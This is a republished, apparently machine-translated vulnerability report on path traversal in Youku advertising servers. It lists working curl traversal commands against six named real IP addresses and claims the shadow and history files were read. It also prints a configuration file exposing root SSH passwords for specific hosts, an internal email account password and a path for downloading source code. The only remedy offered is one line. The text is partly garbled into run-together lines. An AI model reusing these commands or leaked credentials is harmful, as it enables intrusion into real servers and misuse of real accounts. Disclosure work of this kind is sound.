Youku Server File Reading

Source: Internet
Author: User
Tags email account

Youku Server File Reading

Youku Server File Reading and internal information leakage

There are problems with several servers in the advertising system. Attackers can read arbitrary files and have the root permission.
 



The following are the problematic servers.
 

curl http://220.181.185.228/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.185.229/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.180/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.181/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.202/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1curl http://220.181.154.203/../../../../../../../../../etc/sysconfig/network-scripts/ifcfg-eth1




 

 

Take one of them as an example.

Read shadow
 



Read history
 



Reading various configuration files through history
 

 

#-*-Coding: UTF-8-*-[auctionserver_default] # Install the root directory rundir =/opt/workspace/exchange1.2/auctionserver # mode (prod/dev) mode = "prod" # Number of verticle accepted requests mainCore = 8 # Number of verticle connected to dsp beaconCore = 8 # Domain Name of the auction server, server hosts = ["c.miaozhen.atm.youku.com ", "B .miaozhen.atm.youku.com"] # port of the auction Server = 80 # port of the API opened to the Exchange website apiPort = 8080 # default exposure monitoring address impAddr =" http://n.miaozhen.atm.youku.com/x.gif "# Default clickmonitor address clickAddr =" http://n.miaozhen.atm.youku.com/r.gif "# KeymzCookieName =" _ ysuid "# size of the DSP connection pool because multiple beacon, in fact, it is multiplied by the number of beacon clientPoolSize = 100 # Maximum length of the HTTP pipeline queue clientMaxPipelineSize = 200 clientConnectionTimeout = 300 serverIdleTimeout = 700 # whether service fee is required needservicetimeout = "false" # special request "miaozhen1234" isNoticeInPm = "true" # check domain, priority is given to isCheckDomain = "true" isCheckHost = "false" isCheckToken = "false" token = "testToken" # isYouku = "true" useIPsClient = "true ""# dmpisDMP =" false "dmpHost =" 127.0.0.1 "dmpPort = 6379 dmpKey =" YK _ "dmpSep = ", "# Exchange website address websiteHost =" ingress "websitePort = 80 websiteIps = [" 220.181.154.177 "," 123.126.99.87 "," 10.103.20.174 "] websiteHeaderHost =" ingress "# registration interface, you do not need to modify registerApi = "/server/api/addAuction" # budget request interface, you do not need to modify budgetApi = "/pull/api/budget/take" # address of the Redis output from the auction log, default local redisHost = "127.0.0.1" redisPort = 6379 keyBudget = "exchange_auction_budget_backup" # auctionDataDir = "/opt/data/backup/exchange1.2/auctionserver" # Whether to display system logs isShowLog = "true" # Log Retention days logReservedDays = 30 days = "" budgetPort = 8281 budgetHost = "Hangzhou" mappingDmpPort = 6380 mappingDmpHost = "" mappingDspQps = 1 mappingDspUrl = "" mappingDspId =" "" forwardPath = "/" forwardPort = 1234 forwardHost = "127.0.0.1" isForward = "false" heapSize = 10 # start and Stop scripts start = bash bin/start. shstop = bash bin/stop. shcheck = bash bin/check. shrestart = bash bin/restart. shstart_retry = bash bin/start_retry.shstop_retry = bash bin/stop_retry.shbackup = bash bin/backup. sh # Install the target machine password # sshpass = "123456" # Install the target machine port sshport = "1111" [auctionserver_01] # Install the target machine user and domain name (ip) node = root@220.181.154.180sshpass = "ocf (* XzhWt4K" # Name of the auction server serverName = "a05.exchange. ad. b28.youku "[auctionserver_02] # target machine User Installed and domain name (ip) node = root@220.181.154.181sshpass =" isC * & 7 cjpZCW "# Name of the auction server serverName =" a06.exchange. ad. b28.youku "# [auctionserver_03] # installed target machine user and domain name (ip) # node = root@220.181.154.183 # sshpass = "wzxJ ^ # jsQJKv" # Name of the auction server # serverName = "a08.exchange. ad. b28.youku"





List several key file addresses.
 

/opt/workspace/exchange1.2/reportserver/run/start.sh/opt/workspace/exchange1.2/reportserver/code/CMakeLists.txt /opt/workspace/exchange1.2/reportserver/config/mergelog.list/opt/workspace/exchange1.2/reportserver/config/reportserver.cfg/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_new_config.ini/opt/workspace/exchange1.2/auctionserver/conf/exchange_auction_youku_config.ini/opt/workspace/exchange1.2/auctionserver/conf/dsps.txt /home/zczhao/warn/sendlog.perl/opt/workspace/exchange1.2/thirdparts/redis-2.4.17/redis.conf/home/zczhao/cron/reporttab0 2 * * * /home/zczhao/clear/clear_log.sh0 2 * * * /home/zczhao/clear/clear_bz2.sh0 2 * * * /home/zczhao/clear/bz2_day.sh >> /home/zczhao/clear/history.log#*/10 * * * * /home/zczhao/warn/disk_warn.sh*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/run_dnscache.sh*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/heartbeat_check.sh*/10 * * * * bash /opt/workspace/exchange1.2/auctionserver/bin/jmap.sh/opt/data/backup/exchange1.2/reportserver/auction/log/bz2.sh





Sendlog. perl has an internal email account.

my $mail_smtp    = 'mail.youku.com';my $mail_from    = 'systeminformation@youku.com';my $mail_to      = 'dawei.zhang@youku.com';my $auth_id      = 'systeminformation';my $auth_passwd  = '111aaaAAA';my $subject      = "Warn from adExchange13 ($date).";my $body         = `cat /home/zczhao/warn/warn_log`;


 





By the way, you can also download the source code.

Http: // 220.181.185.228/.../../opt/workspace/exchange1.2/auctionserver.2014-07-16-07-52-30.tar.gz
 

Solution:

Enhanced Filtering
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.